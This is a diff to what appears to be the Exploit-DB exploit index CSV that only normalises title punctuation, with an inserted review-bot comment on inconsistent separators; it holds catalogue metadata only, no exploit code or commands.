+20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
 20834,platforms/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service",2001-05-07,nemesystm,windows,dos,0
 20835,platforms/windows/remote/20835.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1)",2001-05-15,"Filip Maertens",windows,remote,0
 20836,platforms/windows/remote/20836.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2)",2001-05-16,HuXfLuX,windows,remote,0
@@ -19180,7 +19180,7 @@ id,file,description,date,author,platform,type,port
 21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure",2002-10-07,frog,php,webapps,0
 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0
 21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0
-21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
+21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
 33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta ",windows,dos,0
 21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection",2002-10-08,hish,php,webapps,0
 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse",2002-10-08,netmask,unix,remote,0
@@ -19302,7 +19302,7 @@ id,file,description,date,author,platform,type,port
 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,"cr4wl3r ",php,webapps,0
 22039,platforms/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0
 22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus <= 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0
-22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0
+22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0
 22042,platforms/php/webapps/22042.php,"VBulletin 2.0.x/2.2.x members2.php Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0
 22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 Script Injection",2002-11-25,"Pete Foster",php,webapps,0
 22044,platforms/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Include",2002-11-25,frog,php,webapps,0
@@ -20119,7 +20119,7 @@ id,file,description,date,author,platform,type,port
 22877,platforms/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,php,webapps,0
 22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 JP2KLib&CoolType Crash PoC",2012-11-21,coolkaveh,windows,dos,0
 22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0
-23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0
+23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0
 23035,platforms/asp/webapps/23035.txt,"Poster 2.0 - Unauthorized Privileged User Access",2003-08-15,DarkKnight,asp,webapps,0
 23036,platforms/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps,0
 23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local,0
@@ -20467,7 +20467,7 @@ id,file,description,date,author,platform,type,port
 23239,platforms/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos,0
 23240,platforms/windows/dos/23240.pl,"mIRC 6.1 DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0
 23241,platforms/windows/dos/23241.pl,"mIRC 6.1 DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0
-23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0
+23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0
 23243,platforms/windows/remote/23243.py,"Free Float FTP Server USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,php,webapps,0
 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0
@@ -21332,7 +21332,7 @@ id,file,description,date,author,platform,type,port
 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
 24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Local Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
 24142,platforms/windows/dos/24142.pl,"MollenSoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,windows,dos,0
-24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0
+24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0
 24144,platforms/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",windows,dos,0
 24145,platforms/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service (1)",2004-05-25,badpack3t,windows,dos,0
 24146,platforms/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service (2)",2004-06-02,CoolICE,windows,dos,0
@@ -24107,7 +24107,7 @@ id,file,description,date,author,platform,type,port
 26988,platforms/php/webapps/26988.txt,"Koobi 5.0 BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0
 26990,platforms/php/webapps/26990.txt,"MyBB 1.0 Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0
-26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products SQL Injection",2005-12-30,DevilBox,asp,webapps,0
+26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products - SQL Injection",2005-12-30,DevilBox,asp,webapps,0
 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0
 26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0
 26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0
@@ -24565,7 +24565,7 @@ id,file,description,date,author,platform,type,port
 27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
 27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0
 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0
-27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0
+27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0
 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0
 27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.php SQL Injection",2003-03-23,r0t,php,webapps,0
 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0
@@ -25306,7 +25306,7 @@ id,file,description,date,author,platform,type,port
 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0
 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0
 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise index.php d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
-28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
+28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 News.php Remote File Include",2006-07-20,AG-Spider,php,webapps,0
 28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0
 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 Common.Inc.php Remote File Include",2006-07-21,Solpot,php,webapps,0
@@ -25389,7 +25389,7 @@ id,file,description,date,author,platform,type,port
 28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,Metasploit,unix,remote,49152
 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443
 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,Metasploit,windows,local,0
-28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443
+28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443
 28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443
 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900
 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0
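Review bot: The new description for 28336 gains the "Product - Title" separator while the next row, 28337, has the same product and title shape and is left in the old form, so the two sibling HP ProCurve Manager entries now follow different conventions in the same hunk. If the separator is the intended house style, the adjacent row should be normalised in the same commit: `28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager - SNAC UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443`. The same partial-normalisation pattern appears in the hunk at 23242 (the neighbouring mIRC rows 23240/23241 keep the old form), though that may be deliberate if the sweep is incremental.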
@@ -25411,7 +25411,7 @@ id,file,description,date,author,platform,type,port
 28355,platforms/php/webapps/28355.txt,"VWar 1.5 news.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
 28356,platforms/php/webapps/28356.txt,"VWar 1.5 stats.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
 28357,platforms/windows/remote/28357.asc,"Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote,0
-28358,platforms/linux/dos/28358.txt,"Linux Kernel 2.6.x (<= 2.6.17.7) - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0
+28358,platforms/linux/dos/28358.txt,"Linux Kernel <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0
 28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 Index.php Remote File Include",2006-08-07,sh3ll,php,webapps,0
 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0
 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 HES Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0
@@ -25475,7 +25475,7 @@ id,file,description,date,author,platform,type,port
 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0
 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0
 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.php Remote File Include",2006-08-22,Root3r_H3ll,php,webapps,0
-28424,platforms/linux/remote/28424.txt,"Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
+28424,platforms/linux/remote/28424.txt,"Apache HTTP Server <= 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0
 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0
 28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0
@@ -25635,7 +25635,7 @@ id,file,description,date,author,platform,type,port
 28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 modules/search.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0
 28586,platforms/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 modules/register Multiple Parameter SQL Injection",2006-09-15,"HACKERS PAL",php,webapps,0
 28587,platforms/asp/webapps/28587.txt,"EasyPage 7 Default.ASPX SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0
-28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0
+28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products - SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0
 28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 Members.ASP Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0
 28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 REP_CLASS Multiple Remote File Include Vulnerabilities",2006-09-16,ERNE,php,webapps,0
 28591,platforms/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 profile.php Multiple Parameter SQL Injection",2006-09-16,"HACKERS PAL",php,webapps,0
@@ -25695,7 +25695,7 @@ id,file,description,date,author,platform,type,port
 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0
 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0
 28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - Filemanager.php Directory Traversal",2006-09-22,GuanYu,php,webapps,0
-28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0
+28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0
 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0
 28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - (.wav) Crash PoC",2013-09-30,xboz,windows,dos,0
 28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
@@ -26294,7 +26294,7 @@ id,file,description,date,author,platform,type,port
 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0
 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0
 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.php Local File Include",2006-12-16,Kacper,php,webapps,0
-29290,platforms/php/remote/29290.c,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80
+29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80
 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0
 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0
 29295,platforms/windows/dos/29295.html,"Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0
@@ -26318,7 +26318,7 @@ id,file,description,date,author,platform,type,port
 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0
 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0
 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0
-29316,platforms/php/remote/29316.py,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0
+29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0
 29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 - Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0
@@ -26539,7 +26539,7 @@ id,file,description,date,author,platform,type,port
 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0
 30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service",2013-12-04,"Neil Kettle",linux,dos,0
 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0
-30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0
+30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0
 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0
 30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow",2007-05-11,"Victor Stinner",linux,dos,0
 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0
@@ -26910,7 +26910,7 @@ id,file,description,date,author,platform,type,port
 29807,platforms/php/remote/29807.php,"PHP <= 5.1.6 Imap_Mail_Compose() Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0
 29808,platforms/php/remote/29808.php,"PHP <= 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote,0
 29809,platforms/linux/dos/29809.txt,"PulseAudio 0.9.5 Assert() Remote Denial of Service",2007-04-02,"Luigi Auriemma",linux,dos,0
-29810,platforms/windows/dos/29810.c,"Symantec Multiple Products SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0
+29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0
 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0
 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 LPEXT.DLL Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0
 29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS Perl Code Evaluation",2013-11-25,Metasploit,hardware,remote,443
@@ -26966,9 +26966,9 @@ id,file,description,date,author,platform,type,port
 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0
 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injection Vulnerabilities",2007-04-18,"John Martinelli",php,webapps,0
 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 PHPBB_Root_Path Remote File Include",2007-04-19,"HACKERS PAL",php,webapps,0
-29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
-29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
-29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
+29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
+29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
+29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.php Remote File Include",2007-04-20,Omni,php,webapps,0
 29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service",2007-04-21,"Levent Kayan",multiple,dos,0
@@ -27980,7 +27980,7 @@ id,file,description,date,author,platform,type,port
 31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0
 31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0
 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,php,webapps,0
-31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0
+31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0
 31099,platforms/php/webapps/31099.txt,"Codice CMS 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0
 31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow",2008-02-04,L4teral,multiple,dos,0
 31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0
@@ -28128,8 +28128,8 @@ id,file,description,date,author,platform,type,port
 31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0
 31232,platforms/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",multiple,dos,0
-31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
-31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
+31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta - /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
+31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
 31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 index.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
 31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 ajax_request.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
 31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 slim.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
@@ -28491,7 +28491,7 @@ id,file,description,date,author,platform,type,port
 31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos,0
 31628,platforms/php/webapps/31628.txt,"Swiki 1.5 - HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0
 31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow",2008-04-08,"Luigi Auriemma",windows,dos,0
-31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/ 9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0
+31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0
 31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 - 'gid' Parameter SQL Injection",2008-04-09,MantiS,php,webapps,0
 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0
 31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Include",2008-04-09,bd0rk,php,webapps,0
@@ -28819,7 +28819,7 @@ id,file,description,date,author,platform,type,port
